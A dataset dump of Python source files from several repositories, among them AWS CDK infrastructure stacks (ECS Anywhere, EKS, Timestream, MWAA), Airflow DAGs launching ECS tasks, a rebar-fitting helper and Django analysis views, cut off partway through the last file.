metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "0916dhkim/SeniorDesign",
"score": 3
} |
#### File: 0916dhkim/SeniorDesign/rebar.py
```python
from math import sqrt, pi
diameter = {}
area = {}
min_num = 3
max_num = 11
for ii in range(min_num, 8+1):
diameter[ii] = ii/8.000
area[ii] = pi * diameter[ii]**2 / 4
for ii in range(9, max_num+1):
area[ii] = ((ii-1)/8) ** 2
diameter[ii] = 2 * sqrt(area[ii]/pi)
def fit_bars(area_req, width, aggregate_size):
count = {}
fail = {'bar': max_num, 'count': 0}
# Find the required number of bars to achieve required area.
for bar_num in range(min_num, max_num+1):
req_num = int(area_req // area[bar_num] + 1)
count[bar_num] = req_num
# Find the configuration with the least reinforcement area.
ret = fail
for bar_num in range(min_num, max_num+1):
if count[bar_num] < 2:
count[bar_num] = 2
if width >= diameter[bar_num]*count[bar_num]+aggregate_size*(count[bar_num]-1):
if ret['count'] is 0 or area[ret['bar']]*ret['count'] > area[bar_num]*count[bar_num]:
ret = {'bar': bar_num, 'count': count[bar_num]}
return ret
``` |
{
"source": "092975/spykesim",
"score": 3
} |
#### File: spykesim/spykesim/test.py
```python
import numpy as np
from joblib import Parallel, delayed, cpu_count
import editsim
def su(a,i):
return a[i].sum();
def execute():
print("test")
dims = (100000,4);
x = editsim.createSharedNumpyArray(dims);
x[:] = np.random.rand(dims[0], dims[1]);
res = Parallel(n_jobs = cpu_count())(delayed(su)(x,i) for i in range(dims[0]));
print(res)
execute()
``` |
{
"source": "094459/beltech-multiarchitecture",
"score": 2
} |
#### File: multi-arch/ecs_anywhere/ecs_anywhere_pipe.py
```python
from aws_cdk import (
aws_iam as iam,
aws_ecs as ecs,
aws_ecr as ecr,
aws_codecommit as codecommit,
aws_codebuild as codebuild,
aws_codepipeline as codepipeline,
aws_codepipeline_actions as codepipeline_actions,
core
)
class EcsAnywherePipeStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, vpc, props, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
# This CDK application uses existing ECS Repo and CodeCommit repositories
# You can easily change create these using CDK
# select ECR
ecr_repo = ecr.Repository.from_repository_name(self, "springbootecrrepo", repository_name=f"{props['ecr-repo']}")
# select code repo
code = codecommit.Repository.from_repository_name(self, "CodeRep", repository_name=f"{props['code-repo']}")
codecommit.CfnRepository.CodeProperty.branch_name="main"
core.CfnOutput(self,"CodeCommitOutput", value=code.repository_clone_url_http)
# create codecommit build steps
# the files references are in the code-repo (armbuild/amdbuild/postbuild)
# from the root folder in the repository
# If you update those (locations/filenames) you will need to update these
arm_build = codebuild.PipelineProject(self, "ARMBuild",
build_spec=codebuild.BuildSpec.from_source_filename("pipeline/ecs-pipeline/armbuild.yml"),
environment=codebuild.BuildEnvironment(
build_image=codebuild.LinuxBuildImage.AMAZON_LINUX_2_ARM,
privileged=True),
environment_variables=self.get_build_env_vars(ecr_repo))
self.add_role_access_to_build(arm_build)
amd_build = codebuild.PipelineProject(self, "AMDBuild",
build_spec=codebuild.BuildSpec.from_source_filename("pipeline/ecs-pipeline/amdbuild.yml"),
environment=codebuild.BuildEnvironment(
build_image=codebuild.LinuxBuildImage.AMAZON_LINUX_2_3,
privileged=True),
environment_variables=self.get_build_env_vars(ecr_repo))
self.add_role_access_to_build(amd_build)
post_build = codebuild.PipelineProject(self, "PostBuild",
build_spec=codebuild.BuildSpec.from_source_filename("pipeline/ecs-pipeline/post_build.yml"),
environment=codebuild.BuildEnvironment(
build_image=codebuild.LinuxBuildImage.AMAZON_LINUX_2_3,
privileged=True),
environment_variables=self.get_build_env_vars(ecr_repo))
self.add_role_access_to_build(post_build)
# create pipeline
source_output = codepipeline.Artifact()
arm_build_output = codepipeline.Artifact("ARMBuildOutput")
amd_build_output = codepipeline.Artifact("AMDBuildOutput")
post_build_output = codepipeline.Artifact("PostBuildOutput")
codepipeline.Pipeline(
self,
"ECSAnyWherePipeline",
pipeline_name="ECSAnyWhere",
stages=[
codepipeline.StageProps(stage_name="Source",
actions=[
codepipeline_actions.CodeCommitSourceAction(
action_name="CodeCommit_Source",
repository=code,
branch='main',
output=source_output)]),
codepipeline.StageProps(stage_name="Build",
actions=[
codepipeline_actions.CodeBuildAction(
action_name="ARM_Build",
project=arm_build,
input=source_output,
outputs=[arm_build_output]),
codepipeline_actions.CodeBuildAction(
action_name="AMD_Build",
project=amd_build,
input=source_output,
outputs=[amd_build_output]),
]),
codepipeline.StageProps(stage_name="PostBuild",
actions=[
codepipeline_actions.CodeBuildAction(
action_name="Post_Build",
project=post_build,
input=source_output,
outputs=[post_build_output])
]),
])
def add_role_access_to_build(self, build):
build.role.add_managed_policy(iam.ManagedPolicy.from_aws_managed_policy_name("AmazonEC2ContainerRegistryFullAccess"))
build.role.add_managed_policy(iam.ManagedPolicy.from_aws_managed_policy_name("AmazonSSMReadOnlyAccess"))
build.role.add_managed_policy(iam.ManagedPolicy.from_aws_managed_policy_name("AWSCodeDeployRoleForECS"))
build.add_to_role_policy(iam.PolicyStatement(actions=["kms:Decrypt", "kms:GenerateDataKey*"], resources=["*"]))
build.add_to_role_policy(iam.PolicyStatement(actions=[
"ec2:DescribeAvailabilityZones",
"ecs:DescribeClusters",
"ecs:DescribeServices",
"ecs:CreateTaskSet",
"ecs:UpdateService*",
"ecs:DeleteTaskSet",
"ssm:PutParameter",
"ecs:DescribeTaskDefinition",
"ecs:RegisterTaskDefinition"], resources=["*"]))
# We need to grab some Parameter Store variables
def get_build_env_vars(self, ecr_repo):
return {
"REPOSITORY_URI": codebuild.BuildEnvironmentVariable(value=ecr_repo.repository_uri),
"ECS_CLUSTER": codebuild.BuildEnvironmentVariable(
value="/demo/ecsanywhere/clustername",
type=codebuild.BuildEnvironmentVariableType.PARAMETER_STORE),
"ECS_SERVICE": codebuild.BuildEnvironmentVariable(
value="/demo/ecsanywhere/servicename",
type=codebuild.BuildEnvironmentVariableType.PARAMETER_STORE),
"ECS_SN": codebuild.BuildEnvironmentVariable(
value="/demo/ecsanywhere/shortcn",
type=codebuild.BuildEnvironmentVariableType.PARAMETER_STORE),
}
``` |
{
"source": "094459/blog-multi-arch-springboot",
"score": 2
} |
#### File: ecs-anywhere/ecs_anywhere/ecs_anywhere_repo.py
```python
from aws_cdk import (
aws_iam as iam,
aws_ecs as ecs,
aws_ecr as ecr,
aws_ec2 as ec2,
aws_ssm as ssm,
aws_logs as log,
aws_autoscaling as autoscaling,
aws_elasticloadbalancingv2 as elbv2,
core
)
from aws_cdk.aws_ecr_assets import DockerImageAsset
class EcsAnywhereLBStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, vpc, props, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
# Create Application Load Balancer and Target Group
# which configures the target IP of the remote Pi
# and sets up the necessary security groups
local_lb_security_group = ec2.SecurityGroup(
self,
"Load Balance internal Springboot http access",
vpc=vpc
)
local_lb_security_group.add_ingress_rule(
ec2.Peer.any_ipv4(),
ec2.Port.tcp(80)
)
local_lb_security_group.add_egress_rule(
ec2.Peer.ipv4(f"{props['mydcinternalcidr']}"),
ec2.Port.tcp(8080)
)
lb = elbv2.ApplicationLoadBalancer(
self,
"LB",
vpc=vpc,
internet_facing=True,
security_group=local_lb_security_group
)
listener = lb.add_listener(
"Listener",
port=80,
open=True
)
remotepi = elbv2.IpTarget(
f"{props['home-pi']}",
port=8080,
availability_zone="all")
listener.add_targets(
"Target",
port=8080,
targets=[remotepi]
)
core.CfnOutput(
self,
id="PiRemoteLB",
value=lb.load_balancer_dns_name,
description="DNS of the Remote Pi Load Balancer"
)
``` |
{
"source": "094459/blogpost-airflow-hybrid",
"score": 2
} |
#### File: ecs-cdk/ecs-anywhere/app.py
```python
from aws_cdk import core
from ecs_anywhere.ecs_anywhere_vpc import EcsAnywhereVPCStack
from ecs_anywhere.ecs_anywhere_taskdef import EcsAnywhereTaskDefStack
env_EU=core.Environment(region="eu-west-2", account="704533066374")
props = {
'ecsclustername':'hybrid-airflow',
'ecr-repo': 'hybrid-airflow',
'image-tag' : 'airflw',
'awsvpccidr':'10.0.0.0/16',
's3':'ricsue-airflow-hybrid'
}
app = core.App()
mydc_vpc = EcsAnywhereVPCStack(
scope=app,
id="ecs-anywhere-vpc",
env=env_EU,
props=props
)
mydc_ecs_cicd = EcsAnywhereTaskDefStack(
scope=app,
id="ecs-anywhere-taskdef",
env=env_EU,
vpc=mydc_vpc.vpc,
props=props
)
app.synth()
```
#### File: ecs-anywhere/ecs_anywhere/ecs_anywhere_vpc.py
```python
from aws_cdk import (
aws_iam as iam,
aws_ec2 as ec2,
core
)
class EcsAnywhereVPCStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, props, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
# Create VPC networking environment
# Public subnet/ "private"(isolated) subnet
# Customer Gateway and Virtual Private Gateway
# Site to Site VPN Connection
self.vpc = ec2.Vpc(
self,
id="mydc-vpn-vpc",
cidr=f"{props['awsvpccidr']}",
nat_gateways=1,
subnet_configuration=[
ec2.SubnetConfiguration(
name="public", cidr_mask=24,
reserved=False, subnet_type=ec2.SubnetType.PUBLIC),
ec2.SubnetConfiguration(
name="private", cidr_mask=24,
#reserved=False, subnet_type=ec2.SubnetType.ISOLATED)
reserved=False, subnet_type=ec2.SubnetType.PRIVATE)
],
max_azs=2,
enable_dns_hostnames=True,
enable_dns_support=True,
vpn_gateway=False
)
core.CfnOutput(
self,
id="VPCId",
value=self.vpc.vpc_id,
description="VPC ID",
export_name=f"{self.region}:{self.account}:{self.stack_name}:vpc-id"
)
```
#### File: blogpost-airflow-hybrid/dag/ecs-hybrid-boto3.py
```python
from airflow import DAG
from datetime import datetime, timedelta
from airflow.operators.python import PythonOperator
import boto3
import json
default_args = {
'owner': 'ubuntu',
'start_date': datetime(2019, 8, 14),
'retry_delay': timedelta(seconds=60*60)
}
# Grab variables - fure improvement
#region
#taskRoleArn
#executionRoleArn
#family
#awslogs-group
#awslogs-stream-prefix
#task-name
#container-image
#command
#cluster
client = boto3.client("ecs", region_name="eu-west-2")
# Function that will take variables and create our new ECS Task Definition
def create_task(ti):
response = client.register_task_definition(
containerDefinitions=[
{
"name": "airflow-hybrid-boto3",
"image": "public.ecr.aws/xxx/xxx:latest",
"cpu": 0,
"portMappings": [],
"essential": True,
"environment": [],
"mountPoints": [],
"volumesFrom": [],
"command": ["ricsue-airflow-hybrid","period1/temp.csv", "select * from customers WHERE location = \"Spain\"", "rds-airflow-hybrid","eu-west-2"],
"logConfiguration": {
"logDriver": "awslogs",
"options": {
"awslogs-group": "/ecs/test-external",
"awslogs-region": "eu-west-2",
"awslogs-stream-prefix": "ecs"
}
}
}
],
taskRoleArn="arn:aws:iam::xxx:role/ecsTaskExecutionRole",
executionRoleArn="arn:aws:iam::xxxx:role/ecsTaskExecutionRole",
family= "test-external",
networkMode="bridge",
requiresCompatibilities= [
"EXTERNAL"
],
cpu= "256",
memory= "512")
# we now need to store the version of the new task so we can ensure idemopotency
new_taskdef=json.dumps(response['taskDefinition']['revision'], indent=4, default=str)
print("TaskDef is now at :" + str(new_taskdef))
return new_taskdef
# Function that will run our ECS Task
def run_task(ti):
#new_taskdef=ti.xcom_pull(key='new_taskdef', task_ids=['create_taskdef'][0])
new_taskdef=ti.xcom_pull(task_ids=['create_taskdef'][0])
print("TaskDef passed is :" + str(new_taskdef))
response2 = client.run_task(
cluster='test-hybrid',
count=1,
launchType='EXTERNAL',
taskDefinition='test-external:{taskdef}'.format(taskdef=new_taskdef)
)
with DAG('airflow_ecsanywhere_boto3', catchup=False, default_args=default_args, schedule_interval=None) as dag:
first_task=PythonOperator(task_id='create_taskdef', python_callable=create_task, provide_context=True, dag=dag)
second_task=PythonOperator(task_id='run_task', python_callable=run_task, provide_context=True, dag=dag)
first_task >> second_task
```
#### File: blogpost-airflow-hybrid/dag/ecs-hybrid.py
```python
from airflow import DAG
from datetime import datetime, timedelta
from airflow.providers.amazon.aws.operators.ecs import ECSOperator
from airflow.operators.python import PythonOperator
import boto3
import json
default_args = {
'owner': 'ubuntu',
'start_date': datetime(2019, 8, 14),
'retry_delay': timedelta(seconds=60*60)
}
# Function that will take variables and create our new ECS Task Definition
def create_task(ti):
client = boto3.client("ecs", region_name="eu-west-2")
response = client.register_task_definition(
containerDefinitions=[
{
"name": "airflow-hybrid-demo",
"image": "public.ecr.aws/xx/xx:latest",
"cpu": 0,
"portMappings": [],
"essential": True,
"environment": [],
"mountPoints": [],
"volumesFrom": [],
"command": ["ricsue-airflow-hybrid","period1/hq-data.csv", "select * from customers WHERE location = \"Spain\"", "rds-airflow-hybrid","eu-west-2"],
"logConfiguration": {
"logDriver": "awslogs",
"options": {
"awslogs-group": "/ecs/test-external",
"awslogs-region": "eu-west-2",
"awslogs-stream-prefix": "ecs"
}
}
}
],
taskRoleArn="arn:aws:iam::xx:role/ecsTaskExecutionRole",
executionRoleArn="arn:aws:iam::xx:role/ecsTaskExecutionRole",
family= "test-external",
networkMode="host",
requiresCompatibilities= [
"EXTERNAL"
],
cpu= "256",
memory= "512")
# we now need to store the version of the new task so we can ensure idemopotency
new_taskdef=json.dumps(response['taskDefinition']['revision'], indent=4, default=str)
print("TaskDef is now at :" + str(new_taskdef))
return new_taskdef
with DAG('hybrid_airflow_dag_test', catchup=False, default_args=default_args, schedule_interval=None) as dag:
create_taskdef = PythonOperator(
task_id='create_taskdef',
provide_context=True,
python_callable=create_task,
dag=dag
)
cloudquery = ECSOperator(
task_id="cloudquery",
dag=dag,
cluster="test-hybrid",
task_definition="test-external",
overrides={ },
launch_type="EC2",
awslogs_group="/ecs/test-external",
awslogs_stream_prefix="ecs"
)
# switch between these to change between remote and local MySQL
# "command" : [ "ricsue-airflow-hybrid","period1/region-data.csv", "select * from customers WHERE location = \"Poland\"", "rds-airflow-hybrid","eu-west-2" ]}
# "command" : [ "ricsue-airflow-hybrid","period1/region-data.csv", "select * from regionalcustomers WHERE country = \"Poland\"", "localmysql-airflow-hybrid","eu-west-2" ]}
remotequery = ECSOperator(
task_id="remotequery",
dag=dag,
cluster="test-hybrid",
task_definition="test-external",
launch_type="EXTERNAL",
overrides={ "containerOverrides": [
{
"name": "airflow-hybrid-demo",
"command" : [ "ricsue-airflow-hybrid","period1/region-data.csv", "select * from regionalcustomers WHERE country = \"Poland\"", "localmysql-airflow-hybrid","eu-west-2" ]}
] },
awslogs_group="/ecs/test-external",
awslogs_stream_prefix="ecs",
)
create_taskdef >> cloudquery
create_taskdef >> remotequery
```
#### File: docker/app/db-details.py
```python
import boto3
import json
def get_secret():
secret_name = "rds-airflow-hybrid"
region_name = "eu-west-2"
# Create a Secrets Manager client
session = boto3.session.Session()
client = session.client(
service_name='secretsmanager',
region_name=region_name
)
get_secret_value_response = client.get_secret_value(SecretId=secret_name)
info=json.loads(get_secret_value_response['SecretString'])
pw=info['password']
un=info['username']
hs=info['host']
db=info['database']
get_secret()
```
#### File: blogpost-airflow-hybrid/scripts/create-ecs-task.py
```python
import boto3
import json
client = boto3.client("ecs", region_name="eu-west-2")
def create_task():
response = client.register_task_definition(
containerDefinitions=[
{
"name": "airflow-hybrid-boto3",
"image": "public.ecr.aws/a4b5h6u6/beachgeek:latest",
"cpu": 0,
"portMappings": [],
"essential": True,
"environment": [],
"mountPoints": [],
"volumesFrom": [],
"command": ["ricsue-airflow-hybrid","period1/temp.csv", "select * from customers WHERE location = \"Spain\"", "rds-airflow-hybrid","eu-west-2"],
"logConfiguration": {
"logDriver": "awslogs",
"options": {
"awslogs-group": "/ecs/test-external",
"awslogs-region": "eu-west-2",
"awslogs-stream-prefix": "ecs"
}
}
}
],
taskRoleArn="arn:aws:iam::704533066374:role/ecsTaskExecutionRole",
executionRoleArn="arn:aws:iam::704533066374:role/ecsTaskExecutionRole",
family= "test-external",
networkMode="HOST",
requiresCompatibilities= [
"EXTERNAL"
],
cpu= "256",
memory= "512")
``` |
{
"source": "094459/dev-con",
"score": 2
} |
#### File: mwaa-redshift/mwaa_redshift/mwaa_redshift_vpc.py
```python
from aws_cdk import core
import aws_cdk.aws_ec2 as ec2
class MwaaRedshiftVPC(core.Stack):
def __init__(self, scope: core.Construct, id: str, props, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
# Create VPC network
self.vpc = ec2.Vpc(
self,
id="MWAA-RedShiftCluster-VPC",
cidr="10.192.0.0/16",
nat_gateways=1,
subnet_configuration=[
ec2.SubnetConfiguration(
name="public", cidr_mask=20,
reserved=False, subnet_type=ec2.SubnetType.PUBLIC),
ec2.SubnetConfiguration(
name="private", cidr_mask=20,
reserved=False, subnet_type=ec2.SubnetType.PRIVATE)
],
max_azs=2,
enable_dns_hostnames=True,
enable_dns_support=True
)
core.CfnOutput(
self,
id="VPCId",
value=self.vpc.vpc_id,
description="VPC ID",
export_name=f"{self.region}:{self.account}:{self.stack_name}:vpc-id"
)
``` |
{
"source": "094459/devday-graviton",
"score": 2
} |
#### File: cdk/backend/backend_stack.py
```python
from aws_cdk import (core, aws_lambda as lambda_,
aws_s3 as s3, aws_eks as eks,
aws_iam as iam, aws_ec2 as ec2)
import json
class BackendStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
# create new vpc
vpc = ec2.Vpc(self, "VPC")
# create eks
self.eks = self.create_eks(vpc)
def create_eks(self, vpc):
# create eks cluster with amd nodegroup
cluster = eks.Cluster(self, "EKS", vpc=vpc, version=eks.KubernetesVersion.V1_18,
default_capacity_instance=ec2.InstanceType("m5.large"),
default_capacity=1)
# add arm/graviton nodegroup
cluster.add_nodegroup_capacity("graviton", desired_size=1,
instance_type=ec2.InstanceType("m6g.large"),
nodegroup_name="graviton", node_role=cluster.default_nodegroup.role)
# add secret access to eks node role
cluster.default_nodegroup.role.add_managed_policy(
iam.ManagedPolicy.from_aws_managed_policy_name("SecretsManagerReadWrite"))
# create service account
sa = self.add_service_account(cluster=cluster, name="aws-load-balancer-controller",
namespace="kube-system")
# add helm charts
ingress = cluster.add_helm_chart("LBIngress", chart="aws-load-balancer-controller",
release="aws-load-balancer-controller",
repository="https://aws.github.io/eks-charts",
namespace="kube-system", values={
"clusterName": cluster.cluster_name,
"serviceAccount.name": "aws-load-balancer-controller",
"serviceAccount.create": "false"
})
return cluster
def add_service_account(self, cluster, name, namespace):
"""
workaround to add helm role to service account
"""
# create role
conditions = core.CfnJson(self, 'ConditionJson',
value = {
"%s:aud" % cluster.cluster_open_id_connect_issuer : "sts.amazonaws.com",
"%s:sub" % cluster.cluster_open_id_connect_issuer : "system:serviceaccount:%s:%s" % (namespace, name),
},
)
principal = iam.OpenIdConnectPrincipal(cluster.open_id_connect_provider).with_conditions({
"StringEquals": conditions,
})
role = iam.Role(self, 'ServiceAccountRole', assumed_by=principal)
# create policy for the service account
statements = []
with open('backend/iam_policy.json') as f:
data = json.load(f)
for s in data["Statement"]:
statements.append(iam.PolicyStatement.from_json(s))
policy = iam.Policy(self, "LBControllerPolicy", statements=statements)
policy.attach_to_role(role)
return eks.KubernetesManifest(self, "ServiceAccount", cluster=cluster,
manifest=[{
"apiVersion": "v1",
"kind": "ServiceAccount",
"metadata": {
"name": name,
"namespace": namespace ,
"labels": {
"app.kubernetes.io/name": name,
"app.kubernetes.io/managed-by": "Helm",
},
"annotations": {
"eks.amazonaws.com/role-arn": role.role_arn,
"meta.helm.sh/release-name": name,
"meta.helm.sh/release-namespace": namespace,
},
},
}],
);
``` |
{
"source": "094459/time-series-and-data-lakes",
"score": 2
} |
#### File: cdk/from_kds_to_timestream/from_kds_to_timestream.py
```python
from aws_cdk import (
aws_iam as iam,
aws_kinesis as kinesis,
aws_lambda as lambda_,
aws_lambda_event_sources as lambda_event_sources,
aws_timestream as timestream,
core
)
class FromKdsToTimestream(core.Construct):
def __init__(self, scope: core.Construct, construct_id: str,
stream: kinesis.Stream, ts_db: timestream.CfnDatabase, ts_table: timestream.CfnTable,
**kwargs) -> None:
super().__init__(scope, construct_id, **kwargs)
# Load all records in the Input Stream into the Raw Time Series Table - AWS Lambda Function
load_data_fn = lambda_.Function(
self, "LoadRawDataFn",
runtime=lambda_.Runtime.PYTHON_3_8,
code=lambda_.Code.from_asset("load_data_fn"),
handler="app.lambda_handler",
environment={
"TIMESTREAM_DATABASE": ts_db.ref,
"TIMESTREAM_TABLE": ts_table.attr_name
}
)
# Lambda Function permission to write to the Raw Time Series Table
load_data_fn.add_to_role_policy(
iam.PolicyStatement(
actions=[
"timestream:WriteRecords",
],
effect=iam.Effect.ALLOW,
resources=[
f"{ts_table.attr_arn}"
],
)
)
# Lambda function permissions to describe Timestream endpoints
load_data_fn.add_to_role_policy(
iam.PolicyStatement(
actions=[
"timestream:DescribeEndpoints"
],
effect=iam.Effect.ALLOW,
resources=["*"],
)
)
# To send Input Stream records to the Lambda function
load_data_fn.add_event_source(
lambda_event_sources.KinesisEventSource(
stream,
starting_position=lambda_.StartingPosition.TRIM_HORIZON,
retry_attempts=2
)
)
```
#### File: tests/unit/test_time_series_and_data_lakes_stack.py
```python
import json
import pytest
from aws_cdk import core
from time_series_and_data_lakes.time_series_and_data_lakes_stack import TimeSeriesAndDataLakesStack
def get_template():
app = core.App()
TimeSeriesAndDataLakesStack(app, "time-series-and-data-lakes")
return json.dumps(app.synth().get_stack("time-series-and-data-lakes").template)
def test_sqs_queue_created():
assert("AWS::SQS::Queue" in get_template())
def test_sns_topic_created():
assert("AWS::SNS::Topic" in get_template())
```
#### File: mwaa-cdk/mwaa_cdk/deploy_files.py
```python
from aws_cdk import core
import aws_cdk.aws_ec2 as ec2
import aws_cdk.aws_s3 as s3
import aws_cdk.aws_s3_deployment as s3deploy
import aws_cdk.aws_iam as iam
class MwaaCdkStackDeployFiles(core.Stack):
def __init__(self, scope: core.Construct, id: str, vpc, mwaa_props, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
# Create MWAA S3 Bucket and upload local dags
dags_bucket = s3.Bucket(
self,
"mwaa-dags",
bucket_name=f"{mwaa_props['dagss3location'].lower()}",
versioned=True,
block_public_access=s3.BlockPublicAccess.BLOCK_ALL
)
dags = s3deploy.BucketDeployment(self, "DeployDAG",
sources=[s3deploy.Source.asset("./dags")],
destination_bucket=dags_bucket,
destination_key_prefix="dags",
prune=False,
retain_on_delete=False
)
# This uploads a requirements.txt file in the requirements
# folder. If not needed, you can comment this out
dagreqs = s3deploy.BucketDeployment(self, "DeployRequirements",
sources=[s3deploy.Source.asset("./requirements")],
destination_bucket=dags_bucket,
destination_key_prefix="requirements",
prune=False,
retain_on_delete=False
)
``` |
{
"source": "0954517662/NEWPY",
"score": 3
} |
#### File: NEWPY/build/anto.py
```python
import antolib.AntoCommon
import paho.mqtt.client as mqtt
client = mqtt.Client()
class Anto():
def __init__(self, user, key, thing):
self.user = user
self.key = key
self.thing = thing
self.mqtt = Mqtt(user, key, thing)
client.username_pw_set(self.user, self.key)
client.connect('service.anto.io', 1883, 60)
#print('Created anto object!')
def getVersion(self):
return AntoCommon.ANTO_VER
def sub(self, channel):
#print('Subscribed to: %s' % channel)
client.subscribe('channel/%s/%s/%s' % (self.user, self.thing, channel))
def pub(self, channel, msg):
print(('Publish \'' + str(msg) + '\' to: ' + str(channel)))
client.publish('channel/%s/%s/%s' % (self.user, self.thing, channel), msg)
def loop(self, loopFunction):
client.loop_start()
while(1):
loopFunction()
class Mqtt():
def __init__(self, user, key, thing):
self.user = user
self.key = key
self.thing = thing
def connect(self):
if hasattr(self, 'onConnectedCB'):
client.on_connect = self.onConnect
if hasattr(self, 'onDisconnectedCB'):
client.on_disconnect = self.onDisconnectedCB
if hasattr(self, 'onPublishedCB'):
client.on_publish = self.onPublishedCB
if hasattr(self, 'onDataCB'):
client.on_message = self.on_message
client.username_pw_set(self.user, self.key)
client.connect('service.anto.io', 1883, 60)
#print('Connected!')
def onConnect(self, client, userdata, flags, rc):
self.onConnectedCB()
def onConnected(self, callback):
self.onConnectedCB = callback
def onDisconnected(self, callback):
self.onDisconnectedCB = callback
def onData(self, callback):
self.onDataCB = callback
def on_message(self, mosq, obj, msg):
topic = msg.topic.split('/')[3]
# send topic and msg to callback
self.onDataCB(topic, msg.payload)
def onPublished(self, callback):
self.onPublishedCB = callback
``` |
{
"source": "097475/hansberger",
"score": 2
} |
#### File: hansberger/analysis/views.py
```python
import numpy
import json
from itertools import chain
from django.shortcuts import redirect
from django.http import HttpResponse
from django_downloadview import VirtualDownloadView
from django.core.files.base import ContentFile
from django.shortcuts import get_object_or_404, render
from django.urls import reverse_lazy
from django.db.transaction import non_atomic_requests
from django.utils.decorators import method_decorator
from django.views.generic import (
View,
CreateView,
DeleteView,
DetailView,
ListView,
)
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from .models import (
Analysis,
FiltrationAnalysis,
MapperAnalysis,
Window,
FiltrationWindow,
MapperWindow,
Bottleneck,
)
from research.models import Research
from .forms import (
SourceChoiceForm,
FiltrationAnalysisCreationForm_Dataset,
FiltrationAnalysisCreationForm_Precomputed,
MapperAnalysisCreationForm_Dataset,
MapperAnalysisCreationForm_Precomputed,
AnalysisBottleneckCreationForm,
WindowBottleneckCreationForm
)
form_dict = {
'filtration_analysis': {
'precomputed': FiltrationAnalysisCreationForm_Precomputed,
'dataset': FiltrationAnalysisCreationForm_Dataset
},
'mapper_analysis': {
'precomputed': MapperAnalysisCreationForm_Precomputed,
'dataset': MapperAnalysisCreationForm_Dataset
}
}
def SourceChoice(request, research_slug):
research = get_object_or_404(Research, slug=research_slug)
# if this is a POST request we need to process the form data
if request.method == 'POST':
# create a form instance and populate it with data from the request:
form = SourceChoiceForm(request.POST)
# check whether it's valid:
if form.is_valid():
cleaned_data = form.cleaned_data
analysis = cleaned_data.get("analysis")
source = cleaned_data.get("source")
if analysis == 'filtration_analysis':
return redirect('analysis:filtrationanalysis-create', form=source, research_slug=research.slug)
elif analysis == 'mapper_analysis':
return redirect('analysis:mapperanalysis-create', form=source, research_slug=research.slug)
# if a GET (or any other method) we'll create a blank form
else:
form = SourceChoiceForm()
return render(request, 'analysis/analysis_source_choice.html', {'form': form, 'research': research})
class AnalysisDetailView(View):
def get(self, request, *args, **kwargs):
my_analysis = (FiltrationAnalysis.objects.filter(
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
).first()
or
MapperAnalysis.objects.filter(
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
).first())
if isinstance(my_analysis, FiltrationAnalysis):
return render(request, 'analysis/filtrationanalysis_detail.html', context={'analysis': my_analysis,
'homology': range(my_analysis.max_homology_dimension + 1)})
elif isinstance(my_analysis, MapperAnalysis):
return render(request, 'analysis/mapperanalysis_detail.html', context={'analysis': my_analysis})
class AnalysisDeleteView(DeleteView):
model = Analysis
context_object_name = 'analysis'
template_name = "analysis/analysis_confirm_delete.html"
def get_object(self):
return (FiltrationAnalysis.objects.filter(
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
).first()
or
MapperAnalysis.objects.filter(
research__slug=self.kwargs['research_slug'],
slug=self.kwargs['analysis_slug']
).first())
def get_success_url(self):
return reverse_lazy('analysis:analysis-list', kwargs={
'research_slug': self.kwargs['research_slug']
})
class AnalysisListView(ListView):
model = Analysis
context_object_name = 'analyses'
paginate_by = 10
template_name = "analysis/analysis_list.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['research'] = self.research
return context
def get_queryset(self):
self.research = get_object_or_404(
Research,
slug=self.kwargs['research_slug']
)
filtration_analyses = FiltrationAnalysis.objects.filter(
research=self.research
).only('name', 'creation_date', 'slug', 'research')
mapper_analyses = MapperAnalysis.objects.filter(
research=self.research
).only('name', 'creation_date', 'slug', 'research')
return sorted(chain(filtration_analyses, mapper_analyses), key=lambda x: x.creation_date, reverse=True)
@method_decorator(non_atomic_requests, name='dispatch')
class FiltrationAnalysisCreateView(CreateView):
model = FiltrationAnalysis
def get_template_names(self):
print(self.get_form_class())
if self.get_form_class() is FiltrationAnalysisCreationForm_Dataset:
return "analysis/filtrationanalysis_dataset_form.html"
elif self.get_form_class() is FiltrationAnalysisCreationForm_Precomputed:
return "analysis/filtrationanalysis_precomputed_form.html"
def get_form_class(self):
return form_dict['filtration_analysis'][self.kwargs['form']]
def get_success_url(self):
return reverse_lazy('analysis:analysis-detail', kwargs={
'research_slug': self.kwargs['research_slug'],
'analysis_slug': self.analysis.slug
})
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['research'] = self.research
return context
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
self.research = get_object_or_404(
Research,
slug=self.kwargs['research_slug']
)
kwargs['research'] = self.research
return kwargs
def form_valid(self, form):
self.analysis = form.save(commit=False)
self.analysis.precomputed_distance_matrix_json = self.precomputed_distance_matrix_json
return super().form_valid(form)
def post(self, request, *args, **kwargs):
self.object = None
form_class = self.get_form_class()
form = self.get_form(form_class)
files = request.FILES.getlist('precomputed_distance_matrix')
if form.is_valid():
precomputed_distance_matrixes = []
for f in sorted(files):
precomputed_distance_matrixes.append(numpy.loadtxt(f).tolist())
self.precomputed_distance_matrix_json = json.dumps(precomputed_distance_matrixes)
return self.form_valid(form)
else:
return self.form_invalid(form)
@method_decorator(non_atomic_requests, name='dispatch')
class MapperAnalysisCreateView(CreateView):
model = MapperAnalysis
def get_template_names(self):
if self.get_form_class() is MapperAnalysisCreationForm_Dataset:
return "analysis/mapperanalysis_dataset_form.html"
elif self.get_form_class() is MapperAnalysisCreationForm_Precomputed:
return "analysis/mapperanalysis_precomputed_form.html"
def get_form_class(self):
return form_dict['mapper_analysis'][self.kwargs['form']]
def get_success_url(self):
return reverse_lazy('analysis:analysis-detail', kwargs={
